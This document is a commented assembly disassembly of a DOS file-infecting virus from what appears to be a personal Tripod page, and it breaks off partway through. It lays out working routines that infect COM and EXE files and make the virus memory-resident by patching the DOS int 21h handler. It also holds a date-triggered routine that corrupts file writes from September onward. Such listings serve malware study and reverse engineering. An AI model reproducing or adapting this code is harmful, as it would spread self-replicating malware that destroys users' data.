Make your own free website on Tripod.com
Prev || Home
seg_a	segment	byte public
	assume	cs:seg_a, ds:seg_a
	org	100h
start:	mov	ax,es						;0100 8C C0
	add	word ptr cs:[d_010C+2],ax ;segment relocation	;0102 2E: 01 06 010E
	jmp	dword ptr cs:[d_010C]	  ;jump into virus code	;0107 2E: FF 2E 010C
d_010C	dw	0000,0138h		;dword=entry into virus	;010C 0000 0138
				;<- duplicated code (aligning to 20h bytes)
	db	0B8h,008h,000h,08Eh,0C0h,08Bh,00Eh,041h	;0110 B8 08 00 8E C0 8B 0E 41
	db	003h,0BAh,028h,000h,02Eh,08Bh,01Eh,09Bh	;0118 03 BA 28 00 2E 8B 1E 9B
;..............................................................
;	victim code
;..............................................................
	org	1380h
;============================================================================
;	Segment aligned virus segment begin
;----------------------------------------------------------------------------
;================================================================
;	COM virus Entry
;	(this code is present only in case *.COM infection)
;----------------------------------------------------------------
l_0000:	push	ds						;1380 1E
	push	cs						;1381 0E
	pop	ds						;1382 1F
	lea	si,cs:[4F7h]		;d_1877 = saved bytes	;1383 8D 36 04F7
	mov	di,100h						;1387.BF 0100
	mov	cx,20h						;138A B9 0020
	rep	movsb			;restore victim bytes	;138D F3/ A4
	mov	byte ptr cs:[349h],0FFh	;d_16C9	(0FFh = COM)	;138F 2E: C6 06 0349 FF
	nop							;1395 90
	pop	ds						;1396 1F
	lea	ax,cs:[54Fh]		;l_18CF			;1397 8D 06 054F
	jmp	ax						;139B FF E0
				;<--- duplicated fields d_033F - d_0347
	dw	0020						;139D 20 00
	dw	05EAh						;139F EA 05
	dw	0Bh						;13A1 0B 00
	dw	28h						;13A3 28 00
	dw	200h						;13A5 00 02
	db	0						;13A7 00
;===========================================================================
;	Begin of file type independent virus code
;---------------------------------------------------------------------------
;================================================================
;	Get/Set victim attribute
;----------------------------------------------------------------
s_13A8	proc	near
	mov	dx,offset ds:[57Fh]	;file name		;13A8.BA 057F
	mov	ah,43h			;get/set file attrb	;13AB B4 43
	int	21h						;13AD CD 21
	retn							;13AF C3
s_13A8	endp
;================================================================
;	Move file ptr to EOF
;----------------------------------------------------------------
s_13B0	proc	near
	xor	cx,cx						;13B0 33 C9
	xor	dx,dx						;13B2 33 D2
	mov	ax,4202h	;move file ptr EOF+offset	;13B4 B8 4202
	mov	bx,cs:[9Bh]	;l_141B = file handle		;13B7 2E: 8B 1E 009B
	int	21h						;13BC CD 21
	retn							;13BE C3
s_13B0	endp
;================================================================
;	Read 32 bytes into buffer
;----------------------------------------------------------------
s_13BF	proc	near
	mov	cx,20h						;13BF B9 0020
	mov	dx,4F7h			;l_1877-sav victim bytes;13C2.BA 04F7
	mov	bx,cs:[9Bh]		;l_141B = file handle	;13C5 2E: 8B 1E 009B
	mov	ah,3Fh			;read file		;13CA B4 3F
	int	21h						;13CC CD 21
	mov	cx,ax			;bytes read		;13CE 8B C8
	retn							;13D0 C3
s_13BF	endp
;================================================================
;	Write 32 B into file
;----------------------------------------------------------------
s_13D1	proc	near
	mov	ax,8			;switch off destruction	;13D1 B8 0008
	mov	es,ax						;13D4 8E C0
	mov	cx,20h						;13D6 B9 0020
	mov	dx,offset ds:[4F7h]	;l_1877 - saved bytes	;13D9.BA 04F7
	mov	bx,cs:[9Bh]		;l_141B = file handle	;13DC 2E: 8B 1E 009B
	mov	ah,40h			;write file cx=bytes	;13E1 B4 40
	int	21h						;13E3 CD 21
	mov	cx,ax						;13E5 8B C8
	retn							;13E7 C3
s_13D1	endp
;================================================================
;	Calculate virus length
;----------------------------------------------------------------
s_13E8	proc	near
	mov	ax,612h			;virus code length	;13E8 B8 0612
	mov	dx,28h			;file type depended code;13EB BA 0028
	sub	ax,dx						;13EE 2B C2
	mov	ds:[341h],ax		;l_16C1	const vcode len	;13F0 A3 0341
	retn							;13F3 C3
s_13E8	endp
;================================================================
;	Get/Set file daye & time
;----------------------------------------------------------------
s_13F4	proc	near
	mov	bx,ds:[9Bh]		;l_141B = file handle	;13F4 8B 1E 009B
	mov	ah,57h		;get/set file date & time	;13F8 B4 57
	int	21h						;13FA CD 21
	retn							;13FC C3
s_13F4	endp
;================================================================
;	Contamine File - master routine
;----------------------------------------------------------------
s_13FD	proc	near
	mov	byte ptr ds:[349h],0	;d_16C9	(000h = EXE)	;13FD C6 06 0349 00
	nop							;1402 90
	mov	al,0						;1403 B0 00
	call	s_13A8			;Get victim attribute	;1405 E8 FFA0
	jc	l_146A			;-> EXIT		;1408 72 60
	mov	ds:[33Fh],cx		;l_16BF oryg. file attr	;140A 89 0E 033F
	mov	cx,20h						;140E B9 0020
	mov	al,1						;1411 B0 01
	call	s_13A8			;Set victim attribute	;1413 E8 FF92
	jc	l_146A			;-> EXIT		;1416 72 52
	jmp	short l_1421					;1418 EB 07
	nop							;141A 90
d_009B	dw	0005h			;file handle		;141B 05 00
d_009D	dw	0400h						;141D 00 04
d_009F	dw	057Fh			;filepath address	;141F 7F 05
l_1421:	mov	word ptr cs:[9Fh],057Fh	;l_141F	:= offset l_18FF;1421 2E C7 06 9F 00 7F 05
	mov	dx,ds:[9Fh]		;l_141F	- file name	;1428 8B 16 009F
	mov	ax,400h						;142C B8 0400
	mov	ds:[9Dh],ax		;l_141D			;142F A3 009D
	mov	al,2						;1432 B0 02
	mov	ah,3Dh			;open file, al=mode	;1434 B4 3D
	int	21h						;1436 CD 21
	mov	word ptr ds:[9Bh],0FFFFh  ;l_141B = file handle	;1438 C7 06 009B FFFF
	jc	l_1443						;143E 72 03
	mov	ds:[9Bh],ax		;l_141B = file handle	;1440 A3 009B
l_1443:	mov	ax,ds:[9Bh]		;l_141B = file handle	;1443 A1 009B
	cmp	ax,0FFFFh					;1446 3D FFFF
	je	l_146A			;-> EXIT, open file err	;1449 74 1F
	mov	al,0						;144B B0 00
	call	s_13F4			;Get file daye & time	;144D E8 FFA4
	jc	l_148F			;-> err, close & exit	;1450 72 3D
	mov	ds:[0E8h],dx		;l_1468 = date		;1452 89 16 00E8
	mov	ds:[0EDh],cx		;l_146D = time		;1456 89 0E 00ED
	call	s_13BF			;Read 32 B into buffer	;145A E8 FF62
	mov	ax,word ptr ds:[4F7h]	;l_1877 first file word	;145D A1 04F7
	cmp	ax,5A4Dh		;'MZ' ?			;1460 3D 5A4D
	je	l_146F			;-> yes, EXE		;1463 74 0A
	jmp	l_1616			;-> no, COM		;1465 E9 01AE
d_00E8	dw	0EF8h			;victim date		;1468 F8 0E
l_146A:	jmp	l_15C6						;146A E9 0159
d_00ED	dw	0001h			;victim time		;146D 01 00
;================================================================
;	EXE file contamination
;----------------------------------------------------------------
l_146F:	mov	ax,word ptr ds:[509h]	;+12h = negative sum	;146F A1 0509
	neg	ax						;1472 F7 D8
	cmp	ax,word ptr ds:[4F9h]	;+2 = last page bytes	;1474 3B 06 04F9
	je	l_148F			;-> allready infected	;1478 74 15
	mov	ax,word ptr ds:[4FBh]	;+4 = pages in file	;147A A1 04FB
	cmp	ax,3						;147D 3D 0003
	jb	l_148F			;-> file to small	;1480 72 0D
	mov	ax,word ptr ds:[4FFh]	;+8 = size of hdr (para);1482 A1 04FF
	mov	cl,4						;1485 B1 04
	shl	ax,cl						;1487 D3 E0
	mov	ds:[347h],ax		;l_16C7	= size of header;1489 A3 0347
	jmp	short l_1492					;148C EB 04
	nop							;148E 90
l_148F:	jmp	l_15A8						;148F E9 0116
l_1492:	mov	ax,word ptr ds:[50Bh]	;+14h = IP		;1492 A1 050B
	mov	word ptr ds:[5B4h],ax	;l_1934			;1495 A3 05B4
	mov	word ptr ds:[50Bh],28h	;new IP value (l_13A8)	;1498 C7 06 050B 0028
	call	s_13B0			;Move file ptr to EOF	;149E E8 FF0F
	push	ax						;14A1 50
	push	dx						;14A2 52
	sub	ax,ds:[347h]		;l_16C7=size of header	;14A3 2B 06 0347
	sbb	dx,0						;14A7 83 DA 00
	mov	word ptr ds:[439h],ax	;l_17B9			;14AA A3 0439
	mov	word ptr ds:[437h],dx	;l_17B7			;14AD 89 16 0437
	cmp	dx,0						;14B1 83 FA 00
	ja	l_14D3			;-> more then 64KB	;14B4 77 1D
	cmp	ax,word ptr ds:[50Bh]	;+14h = IP		;14B6 3B 06 050B
	ja	l_14D3			;-> more then 28h length;14BA 77 17
					;<- EXE code length =< 28h
	mov	word ptr ds:[345h],0	;l_16C5			;14BC C7 06 0345 0000
	mov	bx,word ptr ds:[50Bh]				;14C2 8B 1E 050B
	sub	bx,ax			;28h - file length	;14C6 2B D8
	mov	ds:[343h],bx		;l_16C3	- aligning bytes;14C8 89 1E 0343
	mov	ds:[513h],bx		;+1Ch = ?		;14CC 89 1E 0513
	jmp	short l_1511					;14D0 EB 3F
	nop							;14D2 90
l_14D3:	sub	ax,word ptr ds:[50Bh]	;+14h = IP=28h		;14D3 2B 06 050B
	sbb	dx,0						;14D7 83 DA 00
	mov	ds:[345h],ax		;d_16C5			;14DA A3 0345
	and	ax,0Fh						;14DD 25 000F
	cmp	ax,0						;14E0 3D 0000
	jne	l_14F9			;-> need aligment	;14E3 75 14
	mov	word ptr ds:[343h],0	;d_16C3	- aligning bytes;14E5 C7 06 0343 0000
	mov	ax,ds:[345h]		;d_16C5			;14EB A1 0345
	mov	cx,10h						;14EE B9 0010
	div	cx						;14F1 F7 F1
	mov	ds:[345h],ax		;d_16C5	- segment of vir;14F3 A3 0345
	jmp	short l_1511					;14F6 EB 19
	db	90h						;14F8 90
				;<---- need alignment
l_14F9:	mov	word ptr ds:[343h],10h	;d_16C3	- aligning bytes;14F9 C7 06 0343 0010
	sub	ds:[343h],ax		;d_16C3	- aligning bytes;14FF 29 06 0343
	mov	ax,ds:[345h]		;d_16C5			;1503 A1 0345
	mov	cx,10h						;1506 B9 0010
	div	cx						;1509 F7 F1
	add	ax,1			;+ alignment paragraph	;150B 05 0001
	mov	ds:[345h],ax		;d_16C5	- segment of vir;150E A3 0345
l_1511:	mov	ax,word ptr ds:[50Dh]	;+ 16h = CS		;1511 A1 050D
	mov	word ptr ds:[5B6h],ax	;d_1936 - victim CS	;1514 A3 05B6
	mov	ax,ds:[345h]		;d_16C5			;1517 A1 0345
	mov	word ptr ds:[50Dh],ax	;+ 16h = CS		;151A A3 050D
	push	ax						;151D 50
	mov	ax,word ptr ds:[505h]	;+ 0Eh = SS		;151E A1 0505
	mov	word ptr ds:[5A1h],ax	;d_1921 - victim SS	;1521 A3 05A1
	pop	ax						;1524 58
	mov	word ptr ds:[505h],ax	;+ 0Eh = virus SS	;1525 A3 0505
	mov	ax,word ptr ds:[507h]	;+ 10h = SP		;1528 A1 0507
	mov	word ptr ds:[5A3h],ax	;d_1923 victim SP	;152B A3 05A3
	lea	ax,cs:[612h]		;End of virus		;152E 8D 06 0612
	add	ax,1Eh			;virus stack		;1532 05 001E
	add	ax,ds:[343h]		;d_16C3	- aligning bytes;1535 03 06 0343
	mov	word ptr ds:[507h],ax	;virus SP		;1539 A3 0507
	call	s_13E8			;Calculate virus length	;153C E8 FEA9
	pop	dx			;<- victim EOF		;153F 5A
	pop	ax						;1540 58
	add	ax,ds:[341h]		;l_16C1	const vcode len	;1541 03 06 0341
	adc	dx,0						;1545 83 D2 00
	add	ax,ds:[343h]		;d_16C3	- aligning bytes;1548 03 06 0343
	adc	dx,0						;154C 83 D2 00
	mov	cx,200h			;page length		;154F B9 0200
	div	cx						;1552 F7 F1
	cmp	dx,0						;1554 83 FA 00
	je	l_155A						;1557 74 01
	inc	ax						;1559 40
l_155A:	mov	word ptr ds:[4FBh],ax	;+4 - file len in pages	;155A A3 04FB
	mov	word ptr ds:[4F9h],dx	;+2 - last page length	;155D 89 16 04F9
	neg	dx						;1561 F7 DA
	mov	word ptr ds:[509h],dx	;+12h = negative sum	;1563 89 16 0509
	mov	cx,54Fh			;offset l_18CF-EXE entry;1567 B9 054F
	mov	word ptr ds:[50Bh],cx	;+14h - virus IP	;156A 89 0E 050B
	cmp	word ptr ds:[343h],3	;d_16C3	- aligning bytes;156E 83 3E 0343 03
	jb	l_1580						;1573 72 0B
					;<- file begins with jump
	mov	cx,28h						;1575 B9 0028
	sub	cx,ds:[343h]		;d_16C3	- aligning bytes;1578 2B 0E 0343
	mov	word ptr ds:[50Bh],cx				;157C 89 0E 050B
l_1580:	call	s_15DF			;Set file pointer to BOF;1580 E8 005C
	call	s_13D1			;Write 32 B into file	;1583 E8 FE4B
	jc	l_15A8			;-> error, EXIT		;1586 72 20
	mov	cx,ds:[343h]		;d_16C3	- aligning bytes;1588 8B 0E 0343
	sub	cx,3			;jmp instruction length	;158C 83 E9 03
	mov	ax,54Fh			;offset l_18CF=EXE entry;158F B8 054F
	mov	bx,28h			;beginning of code	;1592 BB 0028
	sub	ax,bx			;jmp distance		;1595 2B C3
	add	cx,ax			;aligning bytes		;1597 03 C8
	mov	word ptr ds:[54Ch],cx	;l_18CC	= jump distance	;1599 89 0E 054C
	call	s_13B0			;Move file ptr to EOF	;159D E8 FE10
	call	s_15C7			;Align EOF to paragraphs;15A0 E8 0024
	jc	l_15A8			;-> error, EXIT		;15A3 72 03
	call	s_15FE			;Write const part of vir;15A5 E8 0056
;================================================================
;	End of contamination (common to EXE & COM)
;----------------------------------------------------------------
l_15A8:	mov	al,1			;to set			;15A8 B0 01
	mov	dx,ds:ds:[0E8h]		;d_1468	victim date	;15AA 8B 16 00E8
	mov	cx,ds:ds:[0EDh]		;d_146D	victim time	;15AE 8B 0E 00ED
	call	s_13F4			;Set file daye & time	;15B2 E8 FE3F
	mov	bx,ds:[9Bh]		;l_141B = file handle	;15B5 8B 1E 009B
	mov	ah,3Eh			;close file		;15B9 B4 3E
	int	21h						;15BB CD 21
	mov	al,1			;to set			;15BD B0 01
	mov	cx,ds:[33Fh]		;l_16BF oryg. file attr	;15BF 8B 0E 033F
	call	s_13A8			;Set victim attribute	;15C3 E8 FDE2
l_15C6:	retn							;15C6 C3
;================================================================
;	Align end of file to paragraphs
;----------------------------------------------------------------
s_15C7:	mov	ax,8			;to switch off virus	;15C7 B8 0008
	mov	es,ax						;15CA 8E C0
	mov	cx,ds:[343h]		;l_16C3	- aligning bytes;15CC 8B 0E 0343
	mov	dx,54Bh			;offset d_18CB		;15D0.BA 054B
	mov	bx,cs:[9Bh]		;l_141B = file handle	;15D3 2E: 8B 1E 009B
	mov	ah,40h			;write file		;15D8 B4 40
	int	21h						;15DA CD 21
	mov	cx,ax						;15DC 8B C8
	retn							;15DE C3
;================================================================
;	Set file pointer to BOF
;----------------------------------------------------------------
s_15DF:	xor	cx,cx						;15DF 33 C9
	xor	dx,dx						;15E1 33 D2
	mov	ax,4200h	;move file ptr, cx,dx=offset	;15E3 B8 4200
	mov	bx,cs:[9Bh]	;l_141B = file handle		;15E6 2E: 8B 1E 009B
	int	21h						;15EB CD 21
	retn							;15ED C3
;================================================================
;	COM virus start code pattern
;----------------------------------------------------------------
d_026E:	mov	ax,es						;15EE 8C C0
	add	word ptr cs:[010Ch+2],ax			;15F0 2E: 01 06 010E
	jmp	dword ptr cs:[010Ch]				;15F5 2E: FF 2E 010C
d_027A	dw	0						;15FA 00 00
d_027C	dw	0138h						;15FC 38 01
;================================================================
;	Write constant part of virus
;----------------------------------------------------------------
s_15FE:	mov	ax,8			;switch off virus	;15FE B8 0008
	mov	es,ax						;1601 8E C0
	mov	cx,ds:[341h]		;l_16C1	const.code leng.;1603 8B 0E 0341
	mov	dx,28h			;offset l_13A8 - vircode;1607.BA 0028
	mov	bx,cs:[9Bh]		;l_141B = file handle	;160A 2E: 8B 1E 009B
	mov	ah,40h			;write file		;160F B4 40
	int	21h						;1611 CD 21
	mov	cx,ax						;1613 8B C8
	retn							;1615 C3
;================================================================
;	COM victim contamination
;----------------------------------------------------------------
l_1616:	cmp	word ptr ds:[4F9h],12Eh	;BOF+2			;1616 81 3E 04F9 012E
	je	l_15A8			;-> contamined, EXIT	;161C 74 8A
	call	s_13B0			;Move file ptr to EOF	;161E E8 FD8F
	cmp	ax,3E8h			;1000 byte file length	;1621 3D 03E8
	jb	l_169F			;-> bellow, EXIT	;1624 72 79
	add	ax,100h			;add PSP		;1626 05 0100
	adc	dx,0						;1629 83 D2 00
	push	ax						;162C 50
	and	ax,0Fh						;162D 25 000F
	mov	word ptr ds:[343h],0	;l_16C3	aligning bytes	;1630 C7 06 0343 0000
	cmp	ax,0						;1636 3D 0000
	je	l_1645			;-> para aligned file	;1639 74 0A
	mov	word ptr ds:[343h],10h	;l_16C3	- aligning bytes;163B C7 06 0343 0010
	sub	ds:[343h],ax		;l_16C3	- aligning bytes;1641 29 06 0343
l_1645:	pop	ax						;1645 58
	add	ax,ds:[343h]		;l_16C3	aligning bytes	;1646 03 06 0343
	adc	dx,0						;164A 83 D2 00
	cmp	dx,0						;164D 83 FA 00
	ja	l_169F			;-> file to big, EXIT	;1650 77 4D
	mov	cl,4						;1652 B1 04
	shr	ax,cl			;bytes 2 paragraphs	;1654 D3 E8
	cmp	word ptr ds:[343h],0	;l_16C3	- aligning bytes;1656 83 3E 0343 00
	mov	ds:[27Ch],ax		;l_15FC	virus segment	;165B A3 027C
	mov	word ptr ds:[27Ah],0	;l_15FA	virus entry	;165E C7 06 027A 0000
	call	s_15DF			;Set file pointer to BOF;1664 E8 FF78
	mov	ax,8			;to switch off virus	;1667 B8 0008
	mov	es,ax						;166A 8E C0
	mov	cx,20h			;bytes to write		;166C B9 0020
	mov	dx,26Eh			;offset l_15EE		;166F.BA 026E
	mov	bx,cs:[9Bh]		;l_141B = file handle	;1672 2E: 8B 1E 009B
	mov	ah,40h			;write file		;1677 B4 40
	int	21h						;1679 CD 21
	mov	cx,ax			;bytes written		;167B 8B C8
	call	s_13B0			;Move file ptr to EOF	;167D E8 FD30
	call	s_15C7			;write aligning bytes	;1680  E8 FF44
	mov	ax,8			;switch off virus	;1683  B8 0008
	mov	es,ax						;1686  8E C0
	mov	cx,28h			;40 bytes		;1688  B9 0028
	mov	dx,322h			;offset l_16A2		;168B .BA 0322
	mov	bx,cs:[9Bh]		;l_141B = file handle	;168E  2E: 8B 1E 009B
	mov	ah,40h			;write file		;1693  B4 40
	int	21h						;1695  CD 21
	mov	cx,ax			;bytes written		;1697 8B C8
	call	s_13E8			;Calculate virus length	;1699 E8 FD4C
	call	s_15FE			;Write const part of vir;169C  E8 FF5F
l_169F:	jmp	l_15A8			;close files, EXIT	;169F  E9 FF06
s_13FD	endp
				;<-- COM type virus begin pattern
d_0322:	push	ds						;16A2 1E
	push	cs						;16A3 0E
	pop	ds						;16A4 1F
	lea	si,cs:[4F7h]					;16A5 8D 36 04F7
	mov	di,0100h					;16A9.BF 0100
	mov	cx,20h						;16AC B9 0020
	rep	movsb						;16AF F3/ A4
	mov	byte ptr cs:[349h],0FFh	;d_16C9	(0FFh = COM)	;16B1 2E: C6 06 0349 FF
	nop							;16B7 90
	pop	ds						;16B8 1F
	lea	ax,cs:[54Fh]					;16B9 8D 06 054F
	jmp	ax						;16BD FF E0
;------ work area
d_033F	dw	0020h			;oryg. file attr	;16BF 20 00
d_0341	dw	05EAh			;const virus code length;16C1 EA 05
d_0343	dw	0Bh			;aligning bytes		;16C3 0B 00
d_0345	dw	28h						;16C5 28 00
d_0347	dw	200h			;size of header		;16C7 00 02
d_0349	db	0			;0=EXE, 0FFh=COM	;16C9 00
;================================================================
;	init registers
;----------------------------------------------------------------
s_16CA	proc	near
	xor	si,si						;16CA 33 F6
	xor	di,di						;16CC 33 FF
	xor	ax,ax						;16CE 33 C0
	xor	dx,dx						;16D0 33 D2
	xor	bp,bp						;16D2 33 ED
	retn							;16D4 C3
s_16CA	endp
;================================================================
;	int 24h handling routine (infection time active only)
;----------------------------------------------------------------
l_16D5:	cmp	di,0						;16D5 83 FF 00
	jne	l_16DD						;16D8 75 03
	mov	al,3			;ignore			;16DA B0 03
	iret							;16DC CF
l_16DD:	jmp	dword ptr cs:[362h]	;L_16E2 = old int 24h	;16DD 2E: FF 2E 0362
d_0362	dw	0556h,0DF0h					;16E2 56 05 F0 0D
;================================================================
;	Get int 24h
;----------------------------------------------------------------
s_16E6	proc	near
	cli		; Disable interrupts			;16E6 FA
	xor	bx,bx						;16E7 33 DB
	mov	es,bx						;16E9 8E C3
	mov	bx,es:[90h]		;int 24h offset		;16EB 26: 8B 1E 0090
	mov	word ptr cs:[362h],bx	;l_16E2			;16F0 2E: 89 1E 0362
	mov	bx,es:[92h]		;int 24h segment	;16F5 26: 8B 1E 0092
	mov	word ptr cs:[362h+2],bx	;L_16E2+2		;16FA 2E: 89 1E 0364
	mov	word ptr es:[90h],355h	;offset l_16D5		;16FF 26: C7 06 0090 0355
	mov	es:[92h],ax		;int 24h segment := CS	;1706 26: A3 0092
	sti							;170A FB
	retn							;170B C3
s_16E6	endp
;================================================================
;	Restore int 24h vector
;----------------------------------------------------------------
s_170C	proc	near
	cli							;170C FA
	xor	bx,bx						;170D 33 DB
	mov	es,bx						;170F 8E C3
	mov	bx,word ptr cs:[362h]				;1711 2E: 8B 1E 0362
	mov	es:[90h],bx					;1716 26: 89 1E 0090
	mov	bx,word ptr cs:[362h+2]				;171B 2E: 8B 1E 0364
	mov	es:[92h],bx					;1720 26: 89 1E 0092
	sti							;1725 FB
	retn							;1726 C3
s_170C	endp
;===============================================================
;	write handle service routine (destruction routine)
;---------------------------------------------------------------
s_1727	proc	near
	push	ax						;1727 50
	push	bx						;1728 53
	push	cx						;1729 51
	push	dx						;172A 52
	push	es						;172B 06
	push	ds						;172C 1E
	push	si						;172D 56
	push	di						;172E 57
	mov	ax,es						;172F 8C C0
	cmp	ax,8						;1731 3D 0008
	je	l_1750		;-> virus contamination		;1734 74 1A
	cmp	bx,4						;1736 83 FB 04
	jb	l_1750		;-> BIOS			;1739 72 15
	mov	ah,2Ah		;get date, cx=year, dx=mon/day	;173B B4 2A
	int	21h						;173D CD 21
	cmp	dh,9		;september ?			;173F 80 FE 09
	jb	l_1750		;-> bellow			;1742 72 0C
	pop	di						;1744 5F
	pop	si						;1745 5E
	pop	ds						;1746 1F
	pop	es						;1747 07
	pop	dx						;1748 5A
	pop	cx						;1749 59
	pop	bx						;174A 5B
	pop	ax						;174B 58
	add	dx,0Ah		;shift buffer address		;174C 83 C2 0A
	retn							;174F C3
l_1750:	pop	di						;1750 5F
	pop	si						;1751 5E
	pop	ds						;1752 1F
	pop	es						;1753 07
	pop	dx						;1754 5A
	pop	cx						;1755 59
	pop	bx						;1756 5B
	pop	ax						;1757 58
	retn							;1758 C3
s_1727	endp
	db	16 dup (0)		;not used		;1759 0010[00]
;================================================================
;	Load & Execute service routine
;----------------------------------------------------------------
s_1769	proc	near
	push	ax						;1769 50
	push	bx						;176A 53
	push	cx						;176B 51
	push	dx						;176C 52
	push	es						;176D 06
	push	ds						;176E 1E
	push	si						;176F 56
	push	di						;1770 57
	mov	si,dx			;file pathname		;1771 8B F2
	mov	ax,cs						;1773 8C C8
	mov	es,ax						;1775 8E C0
	mov	di,offset ds:[57Fh]	;l_18FF - victim name	;1777.BF 057F
	mov	cx,19h						;177A B9 0019
	rep	movsb			;copy victim name	;177D F3/ A4
	call	s_16E6			;Get int 24h vector	;177F E8 FF64
	mov	ds,ax			;ds:=cs			;1782 8E D8
	call	s_13FD						;1784 E8 FC76
	call	s_170C			;Restore int 24h vector	;1787 E8 FF82
	pop	di						;178A 5F
	pop	si						;178B 5E
	pop	ds						;178C 1F
	pop	es						;178D 07
	pop	dx						;178E 5A
	pop	cx						;178F 59
	pop	bx						;1790 5B
	pop	ax						;1791 58
	retn							;1792 C3
s_1769	endp
;================================================================
;	New int 21h service routine
;----------------------------------------------------------------
				;<---- 10 bytes to identify resident virus
d_0413:	pushf							;1793 9C
	cmp	ah,40h		;write handle ?			;1794 80 FC 40
	jne	l_179F		;-> no				;1797 75 06
	call	s_1727		;write handle service routine	;1799 E8 FF8B
	jmp	short l_17A7					;179C EB 09
	nop							;179E 90
l_179F:	cmp	ah,4Bh		;Load & Execute ?		;179F 80 FC 4B
	jne	l_17A7		;-> no				;17A2 75 03
	call	s_1769		;Load & Execute service routine	;17A4 E8 FFC2
l_17A7:	popf							;17A7 9D
;================================================================
;   Execute substituted code and jump into old int 21h service
;----------------------------------------------------------------
					;<- four bytes from int 21h service
d_0428:	cmp	ah,51h						;17A8 80 FC 51
d_042B:	je	l_17B2						;17AB 74 05
	jmp	dword ptr cs:[547h]				;17AD 2E: FF 2E 0547
l_17B2:	jmp	dword ptr cs:[49Dh]				;17B2 2E: FF 2E 049D
d_0437	dw	0000h,02A0h		;dword = code length	;17B7 00 00 A0 02
;================================================================
;	Make virus resident
;----------------------------------------------------------------
s_17BB	proc	near
	cli				;disable interrupts	;17BB FA
	push	es						;17BC 06
	lea	si,cs:[413h]		;l_1793			;17BD 8D 36 0413
	mov	di,si						;17C1 8B FE
	mov	cx,9800h		;resident virus segment	;17C3 B9 9800
	mov	es,cx						;17C6 8E C1
	mov	cx,0Ah						;17C8 B9 000A
	repe	cmpsb						;17CB F3/ A6
	cmp	cx,0						;17CD 83 F9 00
	pop	es						;17D0 07
	jz	l_181A			;-> allready resident	;17D1 74 47
	mov	bx,es:[84h]		;int 21h - offset	;17D3 26: 8B 1E 0084
	mov	ax,es:[86h]		;int 21h - segment	;17D8 26: A1 0086
	mov	word ptr ds:[549h],ax	;l_18C9			;17DC A3 0549
	mov	word ptr ds:[49Fh],ax	;l_181F			;17DF A3 049F
	mov	di,bx						;17E2 8B FB
	mov	es,ax						;17E4 8E C0
	mov	cx,80h						;17E6 B9 0080
	mov	al,80h						;17E9 B0 80
l_17EB:	repne	scasb			;find byte 80h		;17EB F2/ AE
	cmp	cx,0						;17ED 83 F9 00
	je	l_1870			;-> not found, EXIT	;17F0 74 7E
	cmp	byte ptr es:[di],0FCh				;17F2 26: 80 3D FC
	jne	l_17EB			;-> find another place	;17F6 75 F3
					;<- get four bytes from int 21h service
	mov	al,es:[di+2]					;17F8 26: 8A 45 02
	mov	byte ptr cs:[42Bh],al	;l_17AB			;17FC 2E: A2 042B
	mov	al,es:[di-1]					;1800 26: 8A 45 FF
	mov	byte ptr cs:[428h],al	;l_17A8			;1804 2E: A2 0428
	mov	al,es:[di]					;1808 26: 8A 05
	mov	byte ptr cs:[429h],al	;l_17A8+1		;180B 2E: A2 0429
	mov	al,es:[di+1]					;180F 26: 8A 45 01
	mov	byte ptr cs:[42Ah],al	;l_17A8+2		;1813 2E: A2 042A
	jmp	short l_1821					;1817 EB 08
	nop							;1819 90
					;<- allready resident
l_181A:	jmp	short l_1870		;-> EXIT		;181A EB 54
	nop							;181C 90
d_049D	dw	140Dh			;address to jump1 into	;181D 0D 14
d_049F	dw	0278h			;old int 21h segment	;181F 78 02
l_1821:	mov	ax,di						;1821 8B C7
	add	ax,4			;next to conditional jmp;1823 05 0004
	xor	bx,bx						;1826 33 DB
	mov	bl,es:[di+3]		;jump length		;1828 26: 8A 5D 03
	add	ax,bx			;jump address		;182C 03 C3
	mov	word ptr ds:[49Dh],ax	;l_181D			;182E A3 049D
	cmp	byte ptr es:[di+3],80h				;1831 26: 80 7D 03 80
	jb	l_183E			;-> forward jump	;1836 72 06
					;<- jump backwards
	sub	ax,100h			;minus carry		;1838 2D 0100
	mov	word ptr ds:[49Dh],ax	;l_181D			;183B A3 049D
l_183E:	add	di,4			;second condition addrs	;183E 83 C7 04
	mov	word ptr ds:[547h],di				;1841 89 3E 0547
	sub	di,5			;<- area to substitute	;1845 83 EF 05
	push	es						;1848 06
	push	di						;1849 57
	mov	dx,9800h		;resident virus segment	;184A BA 9800
	mov	word ptr cs:[4F5h],dx				;184D 2E: 89 16 04F5
	mov	es,dx						;1852 8E C2
	xor	si,si						;1854 33 F6
	xor	di,di						;1856 33 FF
	mov	cx,612h			;l_1380 -> l_1992	;1858 B9 0612
	rep	movsb			;copy virus code	;185B F3/ A4
				;<----- take control over int 21h
	lea	cx,cs:[413h]		;offset l_1793		;185D 8D 0E 0413
	mov	word ptr ds:[4F3h],cx				;1861 89 0E 04F3
	pop	di						;1865 5F
	pop	es						;1866 07
	mov	cx,5						;1867 B9 0005
	lea	si,cs:[4F2h]		;offset l_1792		;186A 8D 36 04F2
	rep	movsb						;186E F3/ A4
l_1870:	sti							;1870 FB
	retn							;1871 C3
s_17BB	endp
			;<---- instruction pattern to write over int 21h code
d_04F2	db	0EAh			;JMP FAR 9800:l_1793	;1872 EA
d_04F3	dw	0			;:= offset l_1793	;1873 00 00
d_04F5	dw	9800h			;resident virus segment	;1875 00 98
;================================================
;		saved 32 victim bytes
;------------------------------------------------
d_04F7	db	0E9h,0FFh,11h					;1877 E9 FF 11
	db	'Converted',0,0,0,0				;187A 43 6F 6E 76 65 72
								;1880 74 65 64 00 00 00 00
	db	'MZ'						;1887 4D 5A
	db	0EAh,01h,09h,00h,08h,00h			;1889 EA 01 09 00 08 00
	db	20h,00h,00h,00h,0FFh,0FFh			;188F 20 00 00 00 FF FF
	db	98h,00h						;1895 98 00 00
;-----------------------------------
	db	48 dup (0)		;not used		;1897 0030[00]
d_0547	dw	146Ch			;address to jump2 into	;18C7 6C 14
d_0549	dw	0278h			;old int 21h segment	;18C9 78 02
			;<------ code writed to in case of paragraf alignement
	db	0E9h			;jmp l_18CF		;18CB E9
d_054C	dw	052Ch			;distance of jump	;18CC 2C 05
	db	0						;18CE 00
;================================================================
;	EXE virus entry
;----------------------------------------------------------------
l_18CF:	push	bx						;18CF 53
	push	cx						;18D0 51
	push	es						;18D1 06
	push	ds						;18D2 1E
	pushf							;18D3 9C
	mov	ax,cs						;18D4 8C C8
	mov	ds,ax						;18D6 8E D8
	call	s_1938			;make virus resident	;18D8 E8 005D
	cmp	byte ptr ds:[349h],0FFh	;l_16C9	(0FFh=COM)	;18DB 80 3E 0349 FF
